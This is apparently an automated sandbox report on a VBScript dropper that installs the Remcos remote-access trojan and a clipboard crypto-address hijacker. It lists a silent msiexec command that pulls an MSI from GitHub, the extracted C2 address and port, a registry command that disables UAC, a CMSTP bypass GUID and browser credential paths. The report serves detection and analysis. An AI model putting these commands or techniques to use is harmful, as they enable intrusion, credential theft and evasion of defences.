Windows Analysis Report
secondaryTask.vbs

Overview

General Information

Sample name: secondaryTask.vbs
Analysis ID: 1565487
MD5: 183d51767fe58e2bd256688315d25709
SHA1: 2c0f959b61081a10a085ad8e8f8741a69e2d9934
SHA256: 23723f9b4239194a21bf0df559f9e9df8aec1399899346311c09cdcd91a9f1b0
Tags: vbs, user-aachum

Detection

Clipboard Hijacker, MicroClip, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
VBScript performs obfuscated calls to suspicious functions
Yara detected Clipboard Hijacker
Yara detected MicroClip
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found API chain indicative of debugger detection
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Injects a PE file into a foreign process
Installs an MSI (Microsoft Installer) remotely
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Potential evasive VBS script found (sleep loop)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Checks for available system drives (often done to infect USB drives)
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number, etc.) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • wscript.exe (PID: 2976 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\secondaryTask.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • msiexec.exe (PID: 1828 cmdline: "C:\Windows\System32\msiexec.exe" /i https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi /qn MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 4896 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 3552 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 9BBAE1314E73A4B36581DE9B4621B078 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • EHttpSrv.exe (PID: 6024 cmdline: "C:\Users\user\AppData\Local\Temp\EHttpSrv.exe" MD5: 9329BA45C8B97485926A171E34C2ABB8)
      • cmd.exe (PID: 6864 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Updwork.exe (PID: 6032 cmdline: "C:\Users\user\AppData\Local\Temp\Updwork.exe" MD5: 253C52411B256E4AF301CBA58DCB6CEF)
      • WerFault.exe (PID: 6040 cmdline: "C:\Windows\System32\WerFault.exe" MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EHttpSrv.exe (PID: 6868 cmdline: "C:\Users\user\AppData\Local\Temp\EHttpSrv.exe" MD5: 9329BA45C8B97485926A171E34C2ABB8)
    • cmd.exe (PID: 5672 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • EHttpSrv.exe (PID: 6336 cmdline: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe MD5: 9329BA45C8B97485926A171E34C2ABB8)
  • RaftelibeGasrss.exe (PID: 4416 cmdline: "C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe" MD5: 253C52411B256E4AF301CBA58DCB6CEF)
    • WerFault.exe (PID: 5504 cmdline: "C:\Windows\System32\WerFault.exe" MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EHttpSrv.exe (PID: 3212 cmdline: "C:\Users\user\AppData\Local\Temp\EHttpSrv.exe" MD5: 9329BA45C8B97485926A171E34C2ABB8)
    • cmd.exe (PID: 6908 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • EHttpSrv.exe (PID: 6808 cmdline: "C:\Users\user\AppData\Local\Temp\EHttpSrv.exe" MD5: 9329BA45C8B97485926A171E34C2ABB8)
    • cmd.exe (PID: 3260 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • EHttpSrv.exe (PID: 6104 cmdline: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe MD5: 9329BA45C8B97485926A171E34C2ABB8)
  • cleanup
Malware Configuration

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Extracted configuration (Remcos):
{"Host:Port:Password": ["185.157.162.126:1995:1"], "Assigned name": "v", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "qsdazeazd-EL00KX", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Yara Overview

Dropped Files:

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\yljutqdulam | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
C:\Users\user\AppData\Local\Temp\yljutqdulam | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
C:\Users\user\AppData\Local\Temp\yljutqdulam | Windows_Trojan_Remcos_b296e965 | unknown | unknown | strings:
  • 0x6aaa8:$a1: Remcos restarted by watchdog!
  • 0x6b020:$a3: %02i:%02i:%02i:%03i
C:\Users\user\AppData\Local\Temp\yljutqdulam | REMCOS_RAT_variants | unknown | unknown | strings:
  • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64b6c:$str_b2: Executing file:
  • 0x65bec:$str_b3: GetDirectListeningPort
  • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65718:$str_b7: \update.vbs
  • 0x64b94:$str_b9: Downloaded file:
  • 0x64b80:$str_b10: Downloading file:
  • 0x64c24:$str_b12: Failed to upload file:
  • 0x65bb4:$str_b13: StartForward
  • 0x65bd4:$str_b14: StopForward
  • 0x65670:$str_b15: fso.DeleteFile "
  • 0x65604:$str_b16: On Error Resume Next
  • 0x656a0:$str_b17: fso.DeleteFolder "
  • 0x64c14:$str_b18: Uploaded file:
  • 0x64bd4:$str_b19: Unable to delete:
  • 0x65638:$str_b20: while fso.FileExists("
  • 0x650b1:$str_c0: [Firefox StoredLogins not found]
C:\Users\user\AppData\Local\Temp\yljutqdulam | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen | strings:
  • 0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x6497c:$s1: CoGetObject
  • 0x64990:$s1: CoGetObject
  • 0x649ac:$s1: CoGetObject
  • 0x6e938:$s1: CoGetObject
  • 0x6493c:$s2: Elevation:Administrator!new:
Memory Dumps:

Source | Rule | Description | Author | Strings
00000007.00000003.2472818121.00000000021F0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Clipboard_Hijacker_5 | Yara detected Clipboard Hijacker | Joe Security |
00000007.00000003.2472818121.00000000021F0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_MicroClip | Yara detected MicroClip | Joe Security |
00000020.00000002.3108383923.0000000000472000.00000008.00000001.01000000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
Unpacked PEs:

Source | Rule | Description | Author | Strings
8.2.cmd.exe.33007f8.1.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
8.2.cmd.exe.33007f8.1.raw.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen | strings:
  • 0x13648:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x13610:$s2: Elevation:Administrator!new:
8.2.cmd.exe.3302800.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
8.2.cmd.exe.3302800.0.raw.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen | strings:
  • 0x11640:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x11608:$s2: Elevation:Administrator!new:
7.3.Updwork.exe.23c0000.0.raw.unpack | JoeSecurity_Clipboard_Hijacker_5 | Yara detected Clipboard Hijacker | Joe Security |

                      System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\secondaryTask.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\secondaryTask.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\secondaryTask.vbs", ProcessId: 2976, ProcessName: wscript.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 20.233.83.145, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\msiexec.exe, Initiated: true, ProcessId: 4896, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49707
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Updwork.exe, ProcessId: 6032, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\secondaryTask.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\secondaryTask.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\secondaryTask.vbs", ProcessId: 2976, ProcessName: wscript.exe
                      No Suricata rule has matched


                      AV Detection

Source: C:\Users\user\AppData\Local\Temp\http_dll.dll | Avira: detection malicious, Label: TR/HijackLoader.cugkp
Source: C:\Users\user\AppData\Local\Temp\dsx | Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Avira: detection malicious, Label: HEUR/AGEN.1338067
Source: C:\Users\user\AppData\Local\Temp\RaftelibeGarss\zlib1.dll | Avira: detection malicious, Label: HEUR/AGEN.1363590
Source: C:\Users\user\AppData\Local\Temp\yljutqdulam | Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: 30.2.cmd.exe.51900c8.7.raw.unpack | Malware Configuration Extractor: Remcos (same configuration as listed in the Malware Configuration section above)
Source: C:\Users\user\AppData\Local\Temp\RaftelibeGarss\zlib1.dll | ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\dsx | ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Local\Temp\http_dll.dll | ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\yljutqdulam | ReversingLabs: Detection: 89%
Source: Yara match | File source: 16.2.cmd.exe.59c00c8.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.cmd.exe.51900c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.cmd.exe.59c00c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.cmd.exe.51900c8.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000010.00000002.2756412982.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.3107816901.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: cmd.exe PID: 5672, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: EHttpSrv.exe PID: 6336, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: cmd.exe PID: 3260, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: EHttpSrv.exe PID: 6104, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\yljutqdulam, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\dsx, type: DROPPED
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\dsx | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RaftelibeGarss\zlib1.dll | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\yljutqdulam | Joe Sandbox ML: detected
Source: cmd.exe, 00000010.00000002.2756412982.00000000059C0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_92f4d3c4-f

                      Exploits

Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
Source: unknown | HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49709 version: TLS 1.2
                      Source: Binary string: C:\Users\root\Desktop\clipmain\CryptoAddressReplacer\Release\CryptoAddressReplacer.pdb source: Updwork.exe, 00000007.00000003.2472818121.00000000021F0000.00000004.00001000.00020000.00000000.sdmp, Updwork.exe, 00000007.00000003.2472764493.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000014.00000002.3386555271.00000000024C1000.00000002.00000400.00020000.00000000.sdmp, RaftelibeGasrss.exe, 00000016.00000003.2765936238.0000000002930000.00000004.00001000.00020000.00000000.sdmp, RaftelibeGasrss.exe, 00000016.00000003.2765868218.0000000002980000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 0000001B.00000002.3386408179.0000000000421000.00000002.00000400.00020000.00000000.sdmp
                      Source: Binary string: d:\installbuild\kalab\ess_4_0_400\build\apps\work\release\http_server\winnt32\EHttpSrv.pdb source: EHttpSrv.exe, 00000006.00000000.2277424439.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000006.00000002.2333090341.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000000F.00000002.2441043079.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000000F.00000000.2387457596.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000017.00000002.2754803163.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000017.00000000.2671664979.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000018.00000000.2727976985.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000018.00000002.2780689500.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000001D.00000002.2885414724.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000001D.00000000.2832914640.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000020.00000000.3017969340.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000020.00000002.3108167412.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe.3.dr
                      Source: Binary string: msvcr80.i386.pdb source: msvcr80.dll.3.dr
                      Source: Binary string: d:\installbuild\kalab\ess_4_0_400\build\apps\work\release\http_server\winnt32\EHttpSrv.pdb@@P5@ source: EHttpSrv.exe, 00000006.00000000.2277424439.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000006.00000002.2333090341.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000000F.00000002.2441043079.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000000F.00000000.2387457596.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000017.00000002.2754803163.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000017.00000000.2671664979.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000018.00000000.2727976985.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000018.00000002.2780689500.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000001D.00000002.2885414724.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000001D.00000000.2832914640.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000020.00000000.3017969340.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000020.00000002.3108167412.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe.3.dr
                      Source: Binary string: d:\installbuild\kalab\ess_4_0_400\build\apps\work\release\epfw\winnt32\eguiEpfw.pdbd1J source: EHttpSrv.exe, 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 0000000F.00000002.2442351664.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 00000018.00000002.2781571152.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 0000001D.00000002.2886495130.0000000020483000.00000002.00000001.01000000.00000007.sdmp, http_dll.dll.3.dr
                      Source: Binary string: wntdll.pdbUGP source: EHttpSrv.exe, 00000006.00000002.2335103894.0000000002489000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390158763.0000000004EC4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390431920.0000000005330000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2442018605.0000000002461000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755121582.0000000004C47000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755743248.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755650808.00000000021DE000.00000004.00000020.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755930369.0000000002650000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781243411.0000000002416000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833515028.00000000047CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833756998.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886143082.00000000024D9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107403303.0000000004854000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107631545.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108699557.0000000002112000.00000004.00000020.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3109126752.00000000025A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: MFC80U.i386.pdb source: EHttpSrv.exe, 00000006.00000002.2336798815.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 0000000F.00000002.2442489218.000000006C541000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 00000018.00000002.2781699116.000000006C951000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 0000001D.00000002.2886647949.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, mfc80u.dll.3.dr
                      Source: Binary string: wntdll.pdb source: EHttpSrv.exe, 00000006.00000002.2335103894.0000000002489000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390158763.0000000004EC4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390431920.0000000005330000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2442018605.0000000002461000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755121582.0000000004C47000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755743248.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755650808.00000000021DE000.00000004.00000020.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755930369.0000000002650000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781243411.0000000002416000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833515028.00000000047CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833756998.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886143082.00000000024D9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107403303.0000000004854000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107631545.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108699557.0000000002112000.00000004.00000020.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3109126752.00000000025A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\installbuild\kalab\ess_4_0_400\build\apps\work\release\epfw\winnt32\eguiEpfw.pdb source: EHttpSrv.exe, 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 0000000F.00000002.2442351664.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 00000018.00000002.2781571152.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 0000001D.00000002.2886495130.0000000020483000.00000002.00000001.01000000.00000007.sdmp, http_dll.dll.3.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.dr
                      Source: C:\Windows\System32\msiexec.exe | File opened: z:
                      Source: C:\Windows\System32\msiexec.exe | File opened: x:
                      Source: C:\Windows\System32\msiexec.exe | File opened: v:
                      Source: C:\Windows\System32\msiexec.exe | File opened: t:
                      Source: C:\Windows\System32\msiexec.exe | File opened: r:
                      Source: C:\Windows\System32\msiexec.exe | File opened: p:
                      Source: C:\Windows\System32\msiexec.exe | File opened: n:
                      Source: C:\Windows\System32\msiexec.exe | File opened: l:
                      Source: C:\Windows\System32\msiexec.exe | File opened: j:
                      Source: C:\Windows\System32\msiexec.exe | File opened: h:
                      Source: C:\Windows\System32\msiexec.exe | File opened: f:
                      Source: C:\Windows\System32\msiexec.exe | File opened: b:
                      Source: C:\Windows\System32\msiexec.exe | File opened: y:
                      Source: C:\Windows\System32\msiexec.exe | File opened: w:
                      Source: C:\Windows\System32\msiexec.exe | File opened: u:
                      Source: C:\Windows\System32\msiexec.exe | File opened: s:
                      Source: C:\Windows\System32\msiexec.exe | File opened: q:
                      Source: C:\Windows\System32\msiexec.exe | File opened: o:
                      Source: C:\Windows\System32\msiexec.exe | File opened: m:
                      Source: C:\Windows\System32\msiexec.exe | File opened: k:
                      Source: C:\Windows\System32\msiexec.exe | File opened: i:
                      Source: C:\Windows\System32\msiexec.exe | File opened: g:
                      Source: C:\Windows\System32\msiexec.exe | File opened: e:
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | File opened: c:
                      Source: C:\Windows\System32\msiexec.exe | File opened: a:
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Code function: 7_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 7_2_00405768
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Code function: 7_2_004026FE FindFirstFileA, 7_2_004026FE
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Code function: 7_2_004062A3 FindFirstFileA,FindClose, 7_2_004062A3
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | File opened: C:\Users\user\AppData
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | File opened: C:\Users\user
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | File opened: C:\Users\user\AppData\Roaming
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 4x nop then mov word ptr [ebp+edx*2+00h], si 6_2_20404160
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 4x nop then xor dword ptr [edi+eax], ebp 6_2_20403A70
